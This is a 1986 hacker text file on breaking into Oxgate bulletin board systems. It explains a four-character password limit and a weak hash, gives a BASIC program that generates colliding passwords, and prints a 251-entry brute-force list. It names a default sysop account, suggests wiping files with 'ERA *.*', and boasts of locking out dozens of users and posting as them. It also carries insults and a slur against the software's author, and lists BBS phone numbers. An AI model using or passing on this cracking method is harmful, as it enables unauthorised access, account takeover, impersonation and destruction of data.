[!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!] [!] [!] [!] Hacking the Oxgate Public Bulletin Board System [!] [!] [!] [!] Written by: The 0mega & Lord Vision [!] [!] Infinity's Edge -:- 805/683-2725 [!] [!] 10 Megz. 300/1200 baud [!] [!] [!] [!] Call these cool boards: [!] [!] [!] [!] The Cartel..........206/825-6236 [!] [!] Metal Land South..........404/327-2327 [!] [!] Terrapin Station AE..........505/865-0883 [!] [!] [!] [!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!] Written Sept. 20, 1986. Why am I writing a file on hacking a measly public Bulletin Board System? There are a few reasons: Oxgate is probably one of the more popular Public Bulletin Board Systems for CP/M and MS-DOS systems that is cheap (it supercedes the archaic RBBS). Second, I am probably the only person, or one of the few people who knows the in's and out's of this system and can say that Oxgate will be the easiest system you will ever hack (providing you know a few key secrets). Thirdly, I owe the Author of the program, Paul Traina, something special. A couple of years ago, I was a co-sysop on one of these Oxgate systems, and did some modding to the Source Code for the Sysop, so I have had the chance to get to know the system from firsthand experience, and as a Sysop. After a while, Traina decided to be an asshole and try and fuck me over a few times (he's a Jehovah's Witness, what can you expect?) I'm surprised I haven't contracted AIDS yet. But, as it turned out, Traina liked my modds so much, he decided to snake them from me and put them into his newer source code and market his program (Oxgate ver. 6). So for a few reasons, I've decided to write this file - for informational purposes only, of course. All the usual disclaimers apply. I will assume that you, the reader, have a brain of your own and are not influenced by subliminal messages in Text files such as these. SYSTEM OVERVIEW: The Oxgate system is mainly based on CP/M systems. Oxgate also tends to be the next step up for Sysops running RBBS, RCP/M systems. At the end of this article, I will try and list as many of the Oxgate Systems nationally as I can find. I'm sure you can find a more extensive list of other Oxgates off of one of the systems I list. I will assume some knowledge on the reader's part on CP/M systems, but I will try and explain as much as I can along the way. The Program is divided into 3 separate modules, namely: OXENTR, OXGATE, and OXEDIT. OXENTR is the main login program, which accepts password, username, prints any announcements and goes to OXGATE. OXGATE is the main BBS program, which does all the user functions and takes care of the message bases. OXEDIT is a Sysop utility which allows editing users, masking sub-boards the user can access, etc. If you do not understand the following decriptions then, you can come back to them later, after I explain how to get into the CP/M operating System. The CP/M system is usually subdivided thusly: 2 areas (or drives), A>, and B>, each divided into 15 sub-areas, A0> through A14>, and B0> through B14>. All Sysop utilities will be found either on A14> or B14>. You enter these areas simply by typing the Area Name followed by a colon (and a RETURN), for example "B14:" or "A6:". Most of the time, the OXGATE will allow the user to drop into the CP/M operating system, in order to upload/download, etc. The Normal user can usually access A0> through A6>, and some lower B> areas. A0> will contain the OXGATE.COM file so that a user can return to OXGATE from the Operating System (by typing "OXGATE"). A14> will usually contain OXENTR to allow the Sysop (or remote-Sysop) to re-login as another user without having to drop carrier. The OXEDIT utility is also to be found in this area. At the heart of controlling the CP/M access is a small daemon program called WHEEL. WHEEL will watch what areas you try to access and determine whether you can get in or not. If a user has the correct password, he can access all of the areas, change the WHEEL Password, etc. Once the WHEEL is set to allow access to the upper areas, you are Sysop, with the control to access the ERAse command, the OXEDIT utilities, and anything else your heart desires. WHEEL is a COM file that may be called from any area, and you will usually see it in A0>. It may be renamed, of course, so if you are hacking in CP/M, be aware of that. To use WHEEL, you simply type "WHEEL password", and the WHEEL will be set (upon being given the correct password) to let you in to the restricted areas. BBS OVERVIEW AND HACKING INTO IT: As boring as Oxgates are to me (especially for the countless 'daim bramaged' users that seem to flock to them), they seem to be popular. In some cases, the Sysop will restrict the system so that you cannot gain an account automatically; you must log on, answer the questions, and then send an SASE. This tends to discourage users from creating loser accounts, or being 'Twits' as the term goes (comp: Luser, Ruggie, Dick...) There is one big disadvantage to the SASE method that Sysops do not realize, and that I have used severely to my advantage (I was able to shut down, permanently, an Oxgate and force the Sysop to 'retire'). So, the only way to get in is to hack in. When you log on, it will ask for a user name, however, a user # can be entered here, as well. Then it will ask for a password (if that account exists). It will let you type a password with an 80 char. limit, however, the system *ONLY RECOGNIZES THE FIRST FOUR (4) CHARACTERS*. 99% of the users are ignorant of this, and tend to think if they type in 7 letters, they are more safe than if they type 5 letters for their password. And, 99% of the users, in my experience, use only alphabetical characters. That narrows the combinations down considerably to a mere 456,976 (26^4). You could sit there and try them all, but there is another little known fact about the way Oxgate saves passwords that will help considerably. Namely this: Traina decided to get clever (ooh!) and encrypt (tricky!) user passwords with a one-way function (a one-way function in that you cannot derive the original password from the encrypted one, and you are not meant to.) into a 4 digit number, repesentative of the password. Even when a Sysop uses OXEDIT to look at a user, all he will see for a password is that 4 digit number. But, unfortunately for Traina and the Oxgate Sysops, the way that a password is encrypted, there are 4 other possible combinations you can type for a password that will be encrypted *EXACTLY THE SAME*. One person might type "FUCK" for a password, and [as examples] "CAQZ", "BAMZ", "BABE", etc, would also be encrypted the same as "FUCK" is. As far as Oxgate is concerned all those are the same password. So in reality, if a user's password is all alphabetic characters, *THERE ARE ONLY 251 COMBINATIONS* you will have to go through before you get in. Hayes Hackamatic with PPP or Intellihacker, each given a textfile with the 251 combinations will easily hack in! I can hand hack an account in 50 minutes, max. And *ALL* Oxgates suffer from this important weakness. When I was hacking, the Sysops finally got a clue on life and changed their passwords to numbers and other characters which make the number of combinations increase, because they can be combined with alphabetic characters as well. But, that didn't stop me. With the algorithm I will show later on, and a program, you can generate all the combinations and feed them to your auto-hacker. The BBS gives you 3 tries before hanging up. If you want to get in as the Sysop, you must, of course, find out his name. Just log on and look around, if you can. All Oxgates have 1 account at least that will always be there. The name is, of course, Paul Traina. The passwords differ from Oxgate to Oxgate (they are hard-coded into the program), but the Paul Traina account is *ALWAYS* a Sysop. A few other important notes: The Newer Oxgates (version 6 and higher) are compiled; that is to say, the Sysop *DOES NOT* have the source code, and *CANNOT* alter the BBS in any way from what it already is, which means he can't put extra programs in there to discourage hacking. Paul is really protective about his source code, especially since the New Oxgates have a backdoor - and that backdoor cancels the WHEEL allowing him access to all user areas, as well. I don't, unfortunately, know what it is or how it works. Also, (I'm reasonably sure) the new Oxgates keep track of hack attempts, and the passwords tried - I wrote the routine. The way I brought a System down was simple. After hacking a system, (the Sysop noticed through the hack log) the Sysop instigated the SASE, thinking I could not gain anymore accounts. Of course, he wanted to discourage all but real interested users. I had, thanks mostly to Rebel, a nearly complete list of every password used by almost every user in the area. Since the Lusers (ahem, I mean 'Users') never change their passwords, it was simple. I broke into about 30-45 user accounts and changed their passwords so they could not log on, then left the accounts to rot. After a while, it seemed to the Sysop that nobody was calling anymore, and the user could not even log on to leave a complaint, and was probably too pissed or lazy to send another SASE. After that got boring, I started to put words into users's mouths, so to speak. Pissed and unable to do anything about all this, the Sysop shut down. It should be more than easy for you to break in as the Sysop (or anybody you want). There, you can read all private messages, kill messages, access all sub-boards (16 max) or whatever, but to really have System control, you need to go to [C]pm (or [J]ump) and be able to gain access to the higher areas. Once you can do that, you will be able to use the ERAse command, and just do "ERA *.*" (erase all files) on every area, and essentially format it, or access OXEDIT and edit users. But your real hacking task is in hacking the WHEEL program. Once you get the WHEEL password, you will be able to figure out how to set the password to whatever you want. [>] Program to Hack Passwords. [<] /* Alphabetic Passwords range from 2600-3601 /* /* Modify the Range of the Loop in Line 120 /* /* To experiment with other combinations /* 5 REM THANKS TO MR. AMIGAHEAD FOR HELPING WITH 6 REM THE ALGORITHM AND THIS PROGRAM. 100 DIM A$(4):D$ = CHR$ (4):CO = 0 110 HOME : VTAB 12: PRINT SPC( 15);"HACKING... 115 PRINT D$;"OPEN HACK.FILE": PRINT D$;"WRITE HACK.FILE 116 REM "STEP 4" IN LINE 120 TO SKIP 4 OF SAME COMBINATION 120 FOR C = 2600 TO 3601 STEP 4 140 FOR X = 1 TO 4:A$(X) = "A": NEXT 200 REM ATTACK! 210 GOSUB 5000 220 IF PW < C THEN GOSUB 1000: GOTO 210 250 FOR X = 1 TO 4: PRINT A$(X);: NEXT 260 CO = CO + 1: PRINT " ";: IF CO = 10 THEN PRINT :CO = 0 270 NEXT C: PRINT D$;"CLOSE": VTAB 12: PRINT SPC( 15);"FINISHED...";CHR$ ( 7) 1000 REM INC A$(4) 1010 A$(4) = CHR$ ( ASC (A$(4)) + 1) 1020 GOSUB 5000 1030 IF ASC (A$(4)) < = 90 AND PW < C THEN RETURN 2000 REM DEC A$(4), INC A$(3) 2010 A$(4) = CHR$ ( ASC (A$(4)) - 1) 2020 A$(3) = CHR$ ( ASC (A$(3)) + 1) 2030 GOSUB 5000 2040 IF ASC (A$(3)) < = 90 AND PW < C THEN RETURN 3000 REM DEC A$(3), INC A$(2) 3010 A$(3) = CHR$ ( ASC (A$(3)) - 1) 3020 A$(2) = CHR$ ( ASC (A$(2)) + 1) 3030 GOSUB 5000 3040 IF ASC (A$(2)) < = 90 AND PW < C THEN RETURN 4000 REM DEC A$(2), INC A$(1) 4010 A$(2) = CHR$ ( ASC (A$(2)) - 1) 4020 A$(1) = CHR$ ( ASC (A$(1)) + 1) 4030 IF ASC (A$(1)) < = 90 THEN RETURN 5000 REM EVALUATE PW - THE ENCRYPTION ALGORITHM FOLLOWS 5005 REM THAT CONVERTS AN ARRAY/4 CHAR STRING TO 4 DIGIT #. 5010 PW = 0 5020 FOR X = 1 TO 4:PW = PW + ASC (A$(X)) * X * 4: NEXT X 5030 RETURN 5040 END [>] LIST OF 251 COMBINATIONS FOR ALPHABETIC PW [<] /* Produced from above Program /* AAAA BAAA CAAA BBAA BABA BAAB CAAB BBAB BABB BAAC CAAC BBAC BABC BAAD CAAD BBAD BABD BAAE CAAE BBAE BABE BAAF CAAF BBAF BABF BAAG CAAG BBAG BABG BAAH CAAH BBAH BABH BAAI CAAI BBAI BABI BAAJ CAAJ BBAJ BABJ BAAK CAAK BBAK BABK BAAL CAAL BBAL BABL BAAM CAAM BBAM BABM BAAN CAAN BBAN BABN BAAO CAAO BBAO BABO BAAP CAAP BBAP BABP BAAQ CAAQ BBAQ BABQ BAAR CAAR BBAR BABR BAAS CAAS BBAS BABS BAAT CAAT BBAT BABT BAAU CAAU BBAU BABU BAAV CAAV BBAV BABV BAAW CAAW BBAW BABW BAAX CAAX BBAX BABX BAAY CAAY BBAY BABY BAAZ CAAZ BBAZ BABZ CABZ BBBZ BACZ CACZ BBCZ BADZ CADZ BBDZ BAEZ CAEZ BBEZ BAFZ CAFZ BBFZ BAGZ CAGZ BBGZ BAHZ CAHZ BBHZ BAIZ CAIZ BBIZ BAJZ CAJZ BBJZ BAKZ CAKZ BBKZ BALZ CALZ BBLZ BAMZ CAMZ BBMZ BANZ CANZ BBNZ BAOZ CAOZ BBOZ BAPZ CAPZ BBPZ BAQZ CAQZ BBQZ BARZ CARZ BBRZ BASZ CASZ BBSZ BATZ CATZ BBTZ BAUZ CAUZ BBUZ BAVZ CAVZ BBVZ BAWZ CAWZ BBWZ BAXZ CAXZ BBXZ BAYZ CAYZ BBYZ BAZZ CAZZ BBZZ CBZZ BCZZ CCZZ BDZZ CDZZ BEZZ CEZZ BFZZ CFZZ BGZZ CGZZ BHZZ CHZZ BIZZ CIZZ BJZZ CJZZ BKZZ CKZZ BLZZ CLZZ BMZZ CMZZ BNZZ CNZZ BOZZ COZZ BPZZ CPZZ BQZZ CQZZ BRZZ CRZZ BSZZ CSZZ BTZZ CTZZ BUZZ CUZZ BVZZ CVZZ BWZZ CWZZ BXZZ CXZZ BYZZ CYZZ BZZZ CZZZ DZZZ EZZZ FZZZ GZZZ HZZZ IZZZ JZZZ KZZZ LZZZ MZZZ NZZZ OZZZ PZZZ QZZZ RZZZ SZZZ TZZZ UZZZ VZZZ WZZZ XZZZ YZZZ ZZZZ [>] List of Oxgates by Area Code [>] RCP/M Oxgate 002, Milpitas, CA 408/263-2588 RCP/M Oxgate 012, San Jose, CA 408/378-7474 RCP/M Oxgate-DbaseII, Campbell, CA 408/378-8733 RCP/M Oxgate 001, Saratoga, CA 408/354-5934 RCP/M Oxgate 007, Grafton, VA 804/898-7493 RCP/M Oxgate , Santa Barbara, CA 805/682-3486 RCP/M Oxgate , Goleta, CA 805/964-4115 I know there aren't many listed here (obviously, there are at least 12), but in my rush to finish this article, those were all the ones I could find. Try downloading a list of Oxgates off of one of these systems. If you have any comments, or questions, you can leave them to The 0mega in [F]eedback on Infinity's Edge -:- 805/683-2725. The [>]mega Lord Vision Electronic Rebel